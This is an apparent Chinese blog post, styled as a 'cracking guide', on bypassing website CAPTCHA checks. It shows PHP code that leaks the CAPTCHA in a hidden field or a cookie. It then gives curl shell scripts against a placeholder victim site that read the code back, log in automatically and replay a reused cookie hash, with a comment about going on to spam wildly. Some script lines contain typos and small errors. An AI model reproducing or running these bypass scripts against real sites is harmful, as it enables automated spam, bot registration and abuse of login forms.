网站验证码破解功略

所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息,

输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。

很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。

验证码在网页中的例子:
代码

<?


  /*


  *   Filename: authpage.php


  *   Author:   hutuworm


  *   Date:   2003-04-28


  *   @Copyleft hutuworm.org


  */





    srand((double)microtime()*1000000);





    //验证用户输入是否和验证码一致


    if(isset($HTTP_POST_VARS['authinput']))


    {


          if(strcmp($HTTP_POST_VARS['authnum'],$HTTP_POST_VARS['authinput'])==0)


                echo "验证成功!";


          else


                echo "验证失败!";


    }


 


    //生成新的四位整数验证码


    while(($authnum=rand()%10000)<1000);


  ?>


    <form action=authpage.php method=post>


    <table>


          请输入验证码:<input type=text name=authinput style="width: 80px"><br>


          <input type=submit name="验证" value="提交验证码">


          <input type=hidden name=authnum value=<? echo $authnum; ?>>


          <img src=authimg.php?authnum=<? echo $authnum; ?>>


    </table>
    </form>

代码

#!/bin/sh

curl
http://www.vicitm.org/authpage.php

authinput=`grep '<input type=hidden name=authnum value=[[:digit:]]/{4/}>' grep.txt | sed -e 's/[^0-9]//g'` #得到网页中的

authnum

curl
http://www.vicitm.org/authpage.php -d name=hacker -d submit="验证" -d authnum=$authnum

验证码直接存储在网页中,使用cURL就能简单的破掉。
代码

session_register("authnum");

$authnum = strval(rand("1111","9999"));

setcookie("authnum",$authnum);

...

<input type=text name=authnum maxlength=4><img src=get_code.php>

...

if($number != $login_check_number || empty($number))

{

  print("校验码不正确!");

  die();

}

验证码在cookie中的例子:
此类验证程序将验证码存储到用户cookies中,同样十分脆弱。
#!/bin/sh
$username=hacker
$password=hackme
curl
http://www.vicitm.org/index.php -c common_cookie       # 接受服务器的初始cookies
curl
http://www.vicitm.org/get_code.php -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl
http://www.victim.org/login.php -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用

cookies中的验证码登陆

更高级的验证码。
 

有一类验证码比以上两种验证码要高级一些,它使用如下算法:
1。服务器生成一个随机hash。
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
3。hash在cookie中被发送到客户端
3。客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。

特点:因为攻击者不明白服务器所使用的算法,所以无法对服务器转来的cookies进行解码,生成图片。

对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时

,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。

如:
先从服务器上下载一张验证码图片:
curl http://www.victim.org/get_code.php -c cookie -o auth.png
人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。

代码



$savecookie=294b506f05f896dcbb3a0dde86a5e36c  


$num=7701


$username=hacker


$password=hackme





curl
http://www.victim.org/index.php -c $username.cookie # 得到初始化cookies,以及session id


grep -v authhash $username.cookie > tmp.$username     # 扔掉服务器给你的hash


echo "
www.victim.org   FALSE   /   FALSE   0   hash   $savecookie" >> tmp.$username # 强行使用过期hash 和验证码


mv tmp.$username $username.cookie


curl
http://www.victim.org/login.php -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d





authnum=$num # 使用过期验证码登陆。


#登陆成功,去疯狂灌水。。。。。。





最高级的验证码。
它使用如下方法:
1。服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3。hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以

是session id)
4。seq被作为cookies发送给客户端。
5。客户以图片输入验证码。
5。服务器验证方法,服务器并不检查f(hash)==验证码,而是去读取数据库中所期望中的验证码。。如果用户输入与期望所相同,就

成功验证。有些服务器可能还会seq与session id之间的关系进行验证。
6。一旦用户进行了验证操作或重新获取验证码,而是直接将原来数据库中的hash替换。

特点:
×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。

弱点:OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法正常验证)

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值